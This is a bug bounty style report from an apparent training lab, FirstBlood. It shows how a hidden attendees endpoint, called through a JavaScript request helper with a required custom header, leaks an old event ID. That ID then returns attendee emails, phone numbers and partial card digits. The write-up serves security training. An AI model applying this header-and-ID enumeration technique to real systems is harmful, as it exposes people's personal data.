FirstBlood-#18Users information disclosure via /attendees/event.php endpoint
This issue was discovered on FirstBlood v1



On 2021-05-09, panya Level 7 reported:

The site has hackerback event page which reveals /attendees/event.php endpoint via source code:

    <script>
       function getAttendees() {
        var attending = false;

        if (attending == true) {
            sendRequest("/attendees/event.php?q=560720");
       }
    </script>

The sendRequest function is missing but from the manage appointment page we can use the code:

function sendRequest(url) {
   var xhr = new XMLHttpRequest();
        xhr.open("put", url, true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.setRequestHeader("X-SITE-REQ","permitted");
        xhr.setRequestHeader("csrf","99215d4e-0ff3-4275");

        xhr.onreadystatechange = function() {
            if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
                var strHTML = xhr.responseText;
                console.log(strHTML);
            }
        }
        xhr.send();
}

(notice X-SITE-REQ required header) to send the request. The request to /attendees/event.php?q=560720 responds with the information:

{"event":[{"id":"560720","title":"HackerBack","description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking.  At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{}],"able_to_modify":"false","is_event_hidden":"false","old_title":"HackerBack","old_eventID":"560700","old_description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking.  At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","old_massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","old_time":"N/A","old_when":"N/A","cancelled_attendees":[{"fName":"Sean","cancelled":"true"},{"fName":"Abi","cancelled":"true"},{"fName":"John","cancelled":"true"},{"fName":"Melissa","cancelled":"true"}]}]}

It reveals old event id via old_eventID field. And if we will make a request to the url /attendees/event.php?q=560700 we will get sensible information (e.g. emails and phone numbers) about some users:

{"event":[{"id":"560700","title":"HackerBack","description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking.  At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{"name":"Sean R","email":"[email protected]","confirmed":true,"contactNumber":"+44 141 496 0250","last_4_CC":"9090"},{"name":"Trevor B","email":"[email protected]","confirmed":true,"contactNumber":"+44 116 496 0581","last_4_CC":"5323"},{"name":"Julie L","email":"[email protected]","confirmed":true,"contactNumber":"+44 117 496 0999","last_4_CC":"1337"}],"able_to_modify":"false","is_event_hidden":"false","old_title":"HackerBack","old_eventID":"n/a","old_description":"Hackers are known to spend long periods of time on their computers, sometimes (okay, quite a lot!) slouching with bad posture. Overtime this can cause what we call, HackerBack, which is where your back is craving a good ole massage and a rest from hacking.  At HackerBack we will do our best to straighten your back and prevent it from happening again, as well as giving you tips & advice to pass onto others. Sharing is caring, and all need a helping hand sometimes.","old_massage_description":"Massage is the manipulation of the body's soft tissues. Massage techniques are commonly applied with hands, fingers, elbows, knees, forearms, feet, or a device. The purpose of massage is generally for the treatment of body stress or pain. A person professionally trained to give massages is traditionally known as a masseur (male) or a masseuse (female) in European countries. In the United States, these individuals are often referred to as massage therapists because they must be certified and licensed as 'Licensed Massage Therapists'. In professional settings, clients are treated while lying on a massage table, sitting in a massage chair, or lying on a mat on the floor. There are many different modalities in the massage industry including but not limited to: Swedish, deep tissue, structural integration, trigger point, manual lymphatic drainage, sports massage, Thai massage, and medical-massage.","old_time":"N/A","old_when":"N/A","cancelled_attendees":[{"fName":"Sean","cancelled":"true"},{"fName":"Abi","cancelled":"true"},{"fName":"John","cancelled":"true"},{"fName":"Melissa","cancelled":"true"}]}]}

P1 CRITICAL

Endpoint: /attendees/event.php

Parameter: q

Payload: 560700


FirstBlood ID: 13
Vulnerability Type: Information leak/disclosure

/attendees/event can be seen on the HackerBack.html page but has a blank response. Upon further inspection and from making use of the web app, you will notice you can add certain headers in order to interact with this endpoint. An old event ID leaks PII information about attendees.

Report Feedback

@zseano

Creator & Administrator


Nice find Panya! :)